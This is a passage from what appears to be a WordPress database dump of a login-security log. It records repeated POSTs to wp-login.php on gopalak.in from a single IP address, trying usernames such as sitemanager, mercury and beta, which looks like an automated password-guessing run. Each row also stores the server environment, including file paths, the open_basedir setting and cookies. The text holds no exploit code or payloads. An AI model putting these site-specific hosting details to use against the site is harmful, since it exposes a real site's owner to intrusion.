ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746829061.290695;s:12:\"REQUEST_TIME\";i:1746829061;}}','13.201.84.118',1,'2025-05-10 03:47:43','2025-05-11 04:14:47'),(95148,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"121\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"121\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746829061.2885129;s:12:\"REQUEST_TIME\";i:1746829061;}}','13.201.84.118',1,'2025-05-10 03:47:43','2025-05-11 04:14:47'),(95149,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746829061.3071229;s:12:\"REQUEST_TIME\";i:1746829061;}}','13.201.84.118',1,'2025-05-10 03:47:43','2025-05-11 04:14:48'),(95150,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746829327.441695;s:12:\"REQUEST_TIME\";i:1746829327;}}','13.201.84.118',1,'2025-05-10 03:52:10','2025-05-11 04:14:47'),(95151,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"123\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"123\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746829327.441056;s:12:\"REQUEST_TIME\";i:1746829327;}}','13.201.84.118',1,'2025-05-10 03:52:10','2025-05-11 04:14:47'),(95152,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746829327.4425111;s:12:\"REQUEST_TIME\";i:1746829327;}}','13.201.84.118',1,'2025-05-10 03:52:10','2025-05-11 04:14:48'),(95153,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746829329.113163;s:12:\"REQUEST_TIME\";i:1746829329;}}','13.201.84.118',1,'2025-05-10 03:52:10','2025-05-11 04:14:47'),(95154,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746829329.1138041;s:12:\"REQUEST_TIME\";i:1746829329;}}','13.201.84.118',1,'2025-05-10 03:52:10','2025-05-11 04:14:48'),(95155,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"124\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"124\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746829596.4108369;s:12:\"REQUEST_TIME\";i:1746829596;}}','13.201.84.118',1,'2025-05-10 03:56:38','2025-05-11 04:14:47'),(95156,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"116\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"116\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746829596.4129751;s:12:\"REQUEST_TIME\";i:1746829596;}}','13.201.84.118',1,'2025-05-10 03:56:38','2025-05-11 04:14:48'),(95157,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746829596.410049;s:12:\"REQUEST_TIME\";i:1746829596;}}','13.201.84.118',1,'2025-05-10 03:56:38','2025-05-11 04:14:47'),(95158,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.201.84.118\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.201.84.118\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.201.84.118\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v696